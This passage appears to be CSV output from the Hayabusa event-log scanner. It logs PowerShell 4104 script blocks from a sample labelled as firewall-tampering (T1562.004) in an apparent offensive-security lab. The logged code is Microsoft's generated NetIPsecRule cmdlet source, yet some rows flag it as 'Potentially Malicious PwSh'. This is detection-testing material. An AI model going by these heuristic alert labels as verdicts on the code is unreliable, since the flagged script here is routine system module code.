PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] 